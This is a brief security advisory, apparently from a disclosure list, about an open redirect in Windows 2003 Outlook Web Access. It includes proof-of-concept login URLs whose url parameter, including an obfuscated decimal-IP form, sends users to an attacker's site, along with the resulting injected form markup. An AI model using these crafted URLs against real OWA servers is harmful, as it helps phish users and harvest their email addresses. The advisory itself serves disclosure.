Summary
By using specially crafted URL an attacker can cause a user using Microsoft's Windows 2003 Outlook Web Access (OWA) to redirect to an arbitrary URL.
Credit:
The information has been provided by morning_wood.
Details
Vulnerable Systems:
* Microsoft Windows 2003 Outlook Web Access ( OWA )
A vulnerability in Microsoft Windows 20003 Outlook Web Access allows malicious attackers to redirect the login to any URL they wish. This allows the attacker to force the user to the site of the attackers choosing enabling the attacker to use social engineering and phishing style of attacks.
An attacker could also use this attack to gather valid user email addresses, by appending an obfuscated redirected URL with a encoded URL such as
https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/
Proof of Concept:
1. https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost]
2. Click "login"
3. After the injection into the form, the source reveals:
< BODY scroll="AUTO" bgColor="#3D5FA3" text="#000000" leftMargin=0 topMargin=0>
< FORM action="/exchweb/bin/auth/owaauth.dll" method="POST" name="logonForm" autocomplete="off">
< INPUT type="hidden" name="destination" value="http://[otherhost]">
< INPUT type="hidden" name="flags" value="0">
< TABLE id="borderTable" class="standardTable" cellSpacing=0 cellPadding=0 height="100%" width="100%" bgColor="#3D5FA3" border=0>
